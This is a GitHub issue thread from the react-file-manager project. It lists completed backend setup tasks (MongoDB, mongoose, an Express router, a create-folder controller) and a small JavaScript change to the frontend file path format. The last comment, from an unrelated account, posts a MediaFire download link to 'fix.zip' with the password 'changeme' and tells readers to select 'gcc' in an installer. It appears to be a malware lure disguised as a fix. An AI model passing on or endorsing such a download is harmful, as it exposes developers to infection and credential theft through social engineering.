### ISSUE TITLE
MongoDB & Express.js Setup

### ISSUE THREAD

**Issue by Saifullah-dev** [Saifullah-dev/react-file-manager#35]
**Backend:**
- [x] Create Database including single collection for files & folders.
- [x] Configure Database connection using mongoose.
- [x] Create file system schema model.
- [x] Create controller for initial **Create Folder** POST request that create folder in physical storage and save its info to DB.
- [x] Setup express router.
- [x] Configure server.js for DB connection -> CORS config -> JSON parse & routes through Middleware -> Listen to PORT.

**Frontend:**

- [x] Modify files path system of frontend to the [standard way](https://learn.microsoft.com/en-us/dotnet/standard/io/file-path-formats). Changed from "ParentPath" to "ParentPath/FileOrFolderName".

``` javascript
const [files, setFiles] = useState([
    {
      name: "Pictures",
      isDirectory: true,
      path: "/Pictures", // Was previously -> "" i.e. located inside root directory
    },
    {
      name: "Pic.png",
      isDirectory: false,
      path: "/Pictures/Pic.png", // Was previously -> "/Pictures"
    },
  ]);
```

- [x] Provide right arguments to **onCreateFunction** for API (name, parentFolder) & Implement the API call for it.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
